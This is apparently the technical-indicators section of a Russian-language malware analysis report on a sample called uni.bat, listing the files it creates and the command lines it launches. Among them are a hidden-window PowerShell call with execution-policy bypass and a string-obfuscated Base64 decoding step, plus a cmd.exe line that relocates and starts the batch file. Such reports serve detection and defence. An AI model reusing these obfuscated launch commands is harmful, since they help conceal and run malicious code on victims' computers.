Техническая информация
- <Текущая директория>\uni.bat
- %LOCALAPPDATA%\microsoft\clr_v4.0_32\usagelogs\<Имя файла>.exe.log
- %HOMEPATH%\downloads\uni.bat.exe
- %TEMP%\__psscriptpolicytest_nj0lodup.pa2.ps1
- %TEMP%\__psscriptpolicytest_1b0ojw3m.psh.psm1
- %LOCALAPPDATA%\microsoft\clr_v4.0_32\usagelogs\uni.bat.exe.log
- %HOMEPATH%\downloads\uni.bat.exe
- <Текущая директория>\uni.bat в %HOMEPATH%\downloads\uni.bat
- %LOCALAPPDATA%\microsoft\windows\powershell\startupprofiledata-noninteractive
- %ALLUSERSPROFILE%\microsoft\search\data\applications\windows\projects\systemindex\secstore\cist0000.000
- '%HOMEPATH%\downloads\uni.bat.exe' -noprofile -windowstyle hidden -ep bypass -command $HJDB='Fro';$OJiJ='mBase';$Mvpf='64St';$qUum='ring';$vXPZc=$HJDB+$OJiJ+$Mvpf+$qUum;$NdVn='Rea';$MUye='dAl';$JpZZ='lTe';$lcPT='xt';$OFkUv=$NdVn...
- '%WINDIR%\syswow64\cmd.exe' /C cd <Текущая директория>\ & move %cd%\Uni.bat %userprofile%\Downloads\Uni.bat & cd %userprofile%\Downloads\ & start Uni.bat
- '%WINDIR%\syswow64\cmd.exe' /K Uni.bat
- '<SYSTEM32>\searchprotocolhost.exe' Global\UsGthrFltPipeMssGthrPipe3_ Global\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "%...
- '%WINDIR%\syswow64\net.exe' file
- '%WINDIR%\syswow64\net1.exe' file
- '<SYSTEM32>\searchfilterhost.exe' 0 768 772 780 8192 776